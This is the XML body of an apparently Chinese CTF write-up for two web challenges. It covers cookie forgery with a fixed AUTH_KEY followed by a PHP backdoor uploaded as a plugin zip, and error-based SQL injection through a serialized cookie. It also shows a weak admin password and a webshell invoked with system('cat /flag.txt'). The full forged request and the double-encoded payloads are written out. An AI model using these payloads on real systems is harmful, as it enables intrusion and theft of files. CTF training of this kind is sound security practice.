          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25ECD3C0" w14:textId="640DF35B" w:rsidR="00D50ABB" w:rsidRPr="00372828" w:rsidRDefault="00D50ABB" w:rsidP="00D50ABB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/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>粤湾期货</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09843B81" w14:textId="77777777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考点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：越权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+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文件上传</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EB73AB" w14:textId="77777777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漏洞点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/admin/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plugin.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53C13C9D" w14:textId="77777777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利用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15D19C69" w14:textId="77777777" w:rsidR="00942029" w:rsidRPr="00EF164C" w:rsidRDefault="00942029" w:rsidP="00942029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 w:hint="eastAsia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 xml:space="preserve">由于此 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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cms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> 的用户 cookie 是用固定 AUTH_KEY 加密的，所以可以伪造 cookie 在不登录 admin 账号情况下越权访问后台文件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64C" w:rsidRPr="00EF164C" w14:paraId="5B871B6E" w14:textId="77777777" w:rsidTr="00EF164C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09CE261D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GET /admin/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plugin.php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 HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4498DFEE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Host: 127.0.0.1:8068</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D38C8C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User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49C39D97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Accept: text/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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html,application</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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/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xhtml+xml,application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/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xml;q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=0.9,*/*;q=0.8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="708195AD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Accept-Language: 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zh-</w:t>
            </w:r>
            <w:proofErr w:type="gram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CN,zh</w:t>
            </w:r>
            <w:proofErr w:type="gram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;q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=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3657F64C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 xml:space="preserve">Accept-Encoding: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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gzip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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, deflate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6790A38A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Cookie:  PHPSESSID=9ksldotamdg9trc038pd22djb7; EM_AUTHCOOKIE_W5ybaCEXHdrHWkYBR6bvBATPe8K9inQP=admin%7C%7Ce13aca594aae3d6240938911ac7257f7;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32DECE7C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DNT: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28A42D5C" w14:textId="77777777" w:rsidR="00EF164C" w:rsidRPr="00EF164C" w:rsidRDefault="00EF164C" w:rsidP="00EF164C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Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72344D51" w14:textId="17A95870" w:rsidR="00EF164C" w:rsidRPr="00EF164C" w:rsidRDefault="00EF164C" w:rsidP="00942029">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF164C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Upgrade-Insecure-Requests: 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="256A2AE8" w14:textId="77777777" w:rsidR="00942029" w:rsidRPr="00372828" w:rsidRDefault="00942029" w:rsidP="00942029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6"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3972C99A" w14:textId="2C6267E5" w:rsidR="0012411F" w:rsidRPr="00372828" w:rsidRDefault="0012411F" w:rsidP="00942029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6"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00372828">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E2686B8" wp14:editId="511EF9CF">
            <wp:extent cx="5274310" cy="1899920"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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308" w14:textId="387ED76A" w:rsidR="0012411F" w:rsidRPr="00EF164C" w:rsidRDefault="0012411F" w:rsidP="00942029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然后在后台系统，插件管理处可以上传压缩包格式的插件，需要上传文件夹名和文件名相同的内容的压缩包，而且是 php 文件，因此可以构造以下形式的压缩包上传生成后门</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751ACD74" w14:textId="77777777" w:rsidR="0012411F" w:rsidRPr="00372828" w:rsidRDefault="0012411F" w:rsidP="00942029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 w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79733E39" w14:textId="77777777" w:rsidR="0012411F" w:rsidRPr="00372828" w:rsidRDefault="0012411F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6"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00372828">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="PingFang TC" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26B6CF28" wp14:editId="07CFAAAC">
            <wp:extent cx="3721100" cy="546100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A95C" w14:textId="67E3F060" w:rsidR="0012411F" w:rsidRPr="00372828" w:rsidRDefault="0012411F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6"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00372828">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="PingFang TC"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45AC1F62" wp14:editId="2299012B">
            <wp:extent cx="5274310" cy="43116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EC76" w14:textId="34578889" w:rsidR="0012411F" w:rsidRPr="00EF164C" w:rsidRDefault="0012411F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然后访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="PingFang TC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/content/plugins/1/1.php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，读取flag：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369BC2ED" w14:textId="3042810F" w:rsidR="0012411F" w:rsidRPr="00372828" w:rsidRDefault="0012411F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 w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00372828">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="PingFang TC" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="025DE895" wp14:editId="65DD9CF1">
            <wp:extent cx="5274310" cy="238887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750" w14:textId="77777777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修补方案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3B493E0C" w14:textId="77777777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t>1.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越权修补</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DE1EDD" w14:textId="1D1DC7AA" w:rsidR="00D50ABB" w:rsidRPr="00EF164C" w:rsidRDefault="00D50ABB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2.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文件上传修补</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA91E99" w14:textId="2207C83F" w:rsidR="0012411F" w:rsidRPr="00EF164C" w:rsidRDefault="0012411F" w:rsidP="00D50ABB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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274AB48B" w14:textId="3C3975B9" w:rsidR="0012411F" w:rsidRPr="00372828" w:rsidRDefault="0012411F" w:rsidP="0012411F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00372828">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
        </w:rPr>
        <w:t>粤湾租赁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FCF7A8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考点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sqli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+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反序列化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 xml:space="preserve">  +  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弱口令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB5ECF4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漏洞点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64502F78" w14:textId="1C8FEB6E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1.sqli+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反序列化：</w:t>
      </w:r>
      <w:r w:rsidR="0029218A" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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admin/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order.php?act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=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info&amp;order_id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=7</w:t>
      </w:r>
      <w:r w:rsidR="00D346EE" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中Cookie头中的</w:t>
      </w:r>
      <w:r w:rsidR="00D346EE" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ECSCP[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D346EE" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lastfilter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D346EE" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00D346EE" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>项</w:t>
      </w:r>
      <w:r w:rsidR="00850AE3" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00850AE3" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00850AE3" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00850AE3" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>反序列化漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7339FED5" w14:textId="0C63DE34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2.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弱口令：管理员后台登录：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admin/admin123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，</w:t>
      </w:r>
      <w:r w:rsidR="0029218A"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在模板管理处可插入一句话木马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F23555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 w:hint="eastAsia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利用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：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F4AC68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b/>
          <w:bCs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1.sqli+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反序列化直接通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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load_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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()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读取</w:t>
      </w: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flag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文件的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EAA466" w14:textId="1C78A2BE" w:rsidR="00A0152D" w:rsidRPr="00EF164C" w:rsidRDefault="00A0152D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因为</w:t>
      </w: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报错注入只能出32位数据</w:t>
      </w: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，所以分两次注入</w:t>
      </w:r>
      <w:r w:rsidR="00171E89" w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75870A43" w14:textId="2135C59C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payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CF3118" w14:textId="77777777" w:rsidR="00A73B22" w:rsidRPr="00EF164C" w:rsidRDefault="00A73B22" w:rsidP="00A73B22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a:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1:{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s:16:"composite_status";s:86:"1'and(extractvalue(1,concat(0x7e,substr((select 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load_file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('/flag.txt')),1,16),0x7e)))#";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B585D" w14:textId="3F0DF67D" w:rsidR="00A73B22" w:rsidRPr="00EF164C" w:rsidRDefault="00A73B22" w:rsidP="00A73B22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两次</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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urlencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E01081" w14:textId="17A0484B" w:rsidR="0012411F" w:rsidRPr="00EF164C" w:rsidRDefault="00A73B22" w:rsidP="00A73B22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%25%36%31%25%33%61%25%33%31%25%33%61%25%37%62%25%37%33%25%33%61%25%33%31%25%33%36%25%33%61%25%32%32%25%36%33%25%36%66%25%36%64%25%37%30%25%36%66%</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>25%37%33%25%36%39%25%37%34%25%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t>36%35%25%35%66%25%37%33%25%37%34%25%36%31%25%37%34%25%37%35%25%37%33%25%32%32%25%33%62%25%37%33%25%33%61%25%33%38%25%33%36%25%33%61%25%32%32%25%33%31%25%32%37%25%36%31%25%36%65%25%36%34%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%37%33%25%37%35%25%36%32%25%37%33%25%37%34%25%37%32%25%32%38%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%36%63%25%36%66%25%36%31%25%36%34%25%35%66%25%36%36%25%36%39%25%36%63%25%36%35%25%32%38%25%32%37%25%32%66%25%36%36%25%36%63%25%36%31%25%36%37%25%32%65%25%37%34%25%37%38%25%37%34%25%32%37%25%32%39%25%32%39%25%32%63%25%33%31%25%32%63%25%33%31%25%33%36%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33%25%32%32%25%33%62%25%37%64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B02247B" w14:textId="5053B02F" w:rsidR="00ED6518" w:rsidRPr="00EF164C" w:rsidRDefault="00ED6518" w:rsidP="00A73B22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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="180229F1" wp14:editId="61CB539E">
            <wp:extent cx="5274310" cy="219900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0D14" w14:textId="06EA34B2" w:rsidR="004B5EEB" w:rsidRPr="00EF164C" w:rsidRDefault="004B5EEB" w:rsidP="00ED6518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payload：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBC357B" w14:textId="1E74E1AB" w:rsidR="00ED6518" w:rsidRPr="00EF164C" w:rsidRDefault="00ED6518" w:rsidP="00ED6518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a:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1:{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s:16:"composite_status";s:87:"1'and(extractvalue(1,concat(0x7e,substr((select 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load_file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('/flag.txt')),17,32),0x7e)))#";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285C7CC9" w14:textId="2036B6C5" w:rsidR="00ED6518" w:rsidRPr="00EF164C" w:rsidRDefault="00ED6518" w:rsidP="00ED6518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两次</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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urldencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359AE878" w14:textId="6E0E57B7" w:rsidR="00ED6518" w:rsidRPr="00EF164C" w:rsidRDefault="00ED6518" w:rsidP="00ED6518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%25%36%31%25%33%61%25%33%31%25%33%61%25%37%62%25%37%33%25%33%61%25%33%31%25%33%36%25%33%61%25%32%32%25%36%33%25%36%66%25%36%64%25%37%30%25%36%66%25%37%33%25%36%39%25%37%34%25%36%35%25%35%66%25%37%33%25%37%34%25%36%31%25%37%34%25%37%35%25%37%33%25%32%32%25%33%62%25%37%33%25%33%61%25%33%38%25%33%37%25%33%61%25%32%32%25%33%31%25%32%37%25%36%31%25%36%65%25%36%34%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%37%33%25%37%35%25%36%32%25%37%33%25%37%34%25%37%32%25%32%38%25%32%38%25%37%33%25%36%35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t>%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%36%63%25%36%66%25%36%31%25%36%34%25%35%66%25%36%36%25%36%39%25%36%63%25%36%35%25%32%38%25%32%37%25%32%66%25%36%36%25%36%63%25%36%31%25%36%37%25%32%65%25%37%34%25%37%38%25%37%34%25%32%37%25%32%39%25%32%39%25%32%63%25%33%31%25%33%37%25%32%63%25%33%33%25%33%32%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33%25%32%32%25%33%62%25%37%64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3747F181" w14:textId="75503A40" w:rsidR="00ED6518" w:rsidRPr="00EF164C" w:rsidRDefault="00ED6518" w:rsidP="00ED6518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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21D78D35" wp14:editId="12CEC8C6">
            <wp:extent cx="5274310" cy="2731135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452" w14:textId="73F07DB2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PingFang TC"/>
          <w:b/>
          <w:bCs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2.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弱口令：</w:t>
      </w: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admin/admin123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登陆管理员后台，在模板管理</w:t>
      </w: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-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语言配置处可以插入一句话木马，然后读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/flag</w:t>
      </w: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文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C12F9FE" w14:textId="59467E85" w:rsidR="00414E95" w:rsidRPr="00EF164C" w:rsidRDefault="00196562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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65CB384D" wp14:editId="1D7EB2DE">
            <wp:extent cx="5274310" cy="2639060"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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94C1" w14:textId="277209C8" w:rsidR="00196562" w:rsidRPr="00EF164C" w:rsidRDefault="00196562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AppleSystemUIFont"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="AppleExternalUIFontSimplifiedCh" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>然后访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="AppleSystemUIFont"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>languages/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="AppleSystemUIFont"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>zh_cn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="AppleSystemUIFont"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/common.php?1=system('cat /flag.txt’)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="AppleExternalUIFontSimplifiedCh" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="AppleSystemUIFont"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51104DE9" w14:textId="3D63F2BD" w:rsidR="00196562" w:rsidRPr="00EF164C" w:rsidRDefault="00196562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 w:hint="eastAsia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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E640411" wp14:editId="0689386E">
            <wp:extent cx="5274310" cy="12065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1037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PingFang TC" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>修补方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD6F130" w14:textId="77777777" w:rsidR="0012411F" w:rsidRPr="00EF164C" w:rsidRDefault="0012411F" w:rsidP="0012411F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Times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1.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修补</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/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反序列化漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C76FF22" w14:textId="4BCC6E06" w:rsidR="00C0776D" w:rsidRPr="00EF164C" w:rsidRDefault="0012411F" w:rsidP="00935E6D">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="AppleSystemUIFont"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Times"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.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弱口令：在</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
